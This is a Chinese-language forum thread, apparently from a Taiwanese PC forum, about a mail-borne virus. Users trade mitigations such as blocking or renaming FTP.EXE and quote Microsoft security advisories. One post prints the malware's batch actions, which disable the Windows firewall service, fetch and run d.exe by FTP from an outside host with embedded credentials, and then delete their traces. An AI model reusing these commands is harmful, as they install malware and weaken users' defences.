這台主機在 isp 是方電訊 哩.. 那ISP沒責任通知客戶可能主機被當木馬或行為異常嗎
可列印頁面
這台主機在 isp 是方電訊 哩.. 那ISP沒責任通知客戶可能主機被當木馬或行為異常嗎
r.vbs 動作
cmd /c net stop sharedaccess
echo o www.g03z.com>i.txt
echo aa33>>i.txt
echo bb33>>i.txt
echo get d d.exe>>i.txt
echo bye>>i.txt
ftp -s:i.txt
del i.txt
d.exe
del ?.vbs
del d.exe
start [url]http://tw.match.yahoo.com/[/url]
del ? ?.bat 0
基本上這一陣子的mail lnk病毒只要不允許FTP.EXE執行就可以全檔掉了.
[QUOTE=sylovanas;1073288]基本上這一陣子的mail lnk病毒只要不允許FTP.EXE執行就可以全檔掉了.[/QUOTE]
小弟再也不敢輕忽只有兩三Kbytes 的郵件了, 但是某些同事有時需要造訪外部FTP Server, 所以不能完全禁止FTP, 只能自求多福
或者是將FTP.EXE改名,平常用改名的FTP.EXE作業
像是FTP.EXE => FTP1.EXE
之後使用權限或IFEO或本機安全性原則鎖FTP.EXE不知可不可行?
[URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882): Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[LIST][*]依照預設,所有 Microsoft Outlook 及 Microsoft Outlook Express 支援版本都會在 [限制的網站] 區域開啟 HTML 電子郵件訊息。 [限制的網站] 區域可阻止讀取 HTML 電子郵件訊息時使用 Active Scripting 與 ActiveX 控制項,有助於減輕企圖利用這個弱點的攻擊。然而,如果使用者按下電子郵件訊息中的連結,仍有可能因為網頁式攻擊而受此弱點遭利用的影響。[*]在網頁式攻擊的案例中,攻擊者可架設一個網站,並在其中包含利用此弱點的網頁。此外,受侵害的網站以及接受或存放使用者提供之內容或廣告的網站裡,也可能包含蓄意製作以利用本弱點的內容。 但是,攻擊者無法強迫使用者造訪網站,而是引誘使用者自行前往。一般的做法是設法讓使用者按一下電子郵件或 Instant Messenger 訊息中通往攻擊者網站的連結。[/LIST]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大: Internet Explorer 積存安全性更新 (972260)[/URL]
[LIST][*][URL="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&FamilyID=22bed634-5227-4a22-8df5-801f3e2e232a"]下載詳細資料: KB972260:Internet Explorer for Windows XP 安全性更新[/URL] (for IE6 x86)[/LIST]
[QUOTE=FYI;1073308][URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882): Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[LIST][*]依照預設,所有 Microsoft Outlook 及 Microsoft Outlook Express 支援版本都會在 [限制的網站] 區域開啟 HTML 電子郵件訊息。 [限制的網站] 區域可阻止讀取 HTML 電子郵件訊息時使用 Active Scripting 與 ActiveX 控制項,有助於減輕企圖利用這個弱點的攻擊。然而,如果使用者按下電子郵件訊息中的連結,仍有可能因為網頁式攻擊而受此弱點遭利用的影響。[*]在網頁式攻擊的案例中,攻擊者可架設一個網站,並在其中包含利用此弱點的網頁。此外,受侵害的網站以及接受或存放使用者提供之內容或廣告的網站裡,也可能包含蓄意製作以利用本弱點的內容。 但是,攻擊者無法強迫使用者造訪網站,而是引誘使用者自行前往。一般的做法是設法讓使用者按一下電子郵件或 Instant Messenger 訊息中通往攻擊者網站的連結。[/LIST]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大: Internet Explorer 積存安全性更新 (972260)[/URL]
[LIST][*][URL="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&FamilyID=22bed634-5227-4a22-8df5-801f3e2e232a"]下載詳細資料: KB972260:Internet Explorer for Windows XP 安全性更新[/URL] (for IE6 x86)[/LIST][/QUOTE]
Oh
那些Yahoo病毒信沒這麼高竿
只是很單純的寫了一些文字
然後夾檔要讓你點下去而已
[IMG]http://www.pczone.com.tw/members/33275-albums14-picture-440.png[/IMG]
[QUOTE=FYI;1073308][URL="http://www.microsoft.com/taiwan/technet/security/advisory/973882.mspx"]Microsoft 安全性摘要報告 (973882): Microsoft Active Template Library (ATL) 中的弱點可能會允許遠端執行程式碼[/URL]
[URL="http://www.microsoft.com/taiwan/technet/security/bulletin/ms09-034.mspx"]Microsoft 安全性公告 MS09-034 - 重大: Internet Explorer 積存安全性更新 (972260)[/URL][/QUOTE]
以上兩則報告建議將網際網路和近端內部網路的安全層級變更為高安全性, 要注意的是高安全性會關閉Javascript (Active scripting), 若是參照辦理, 則建議啟用Active scripting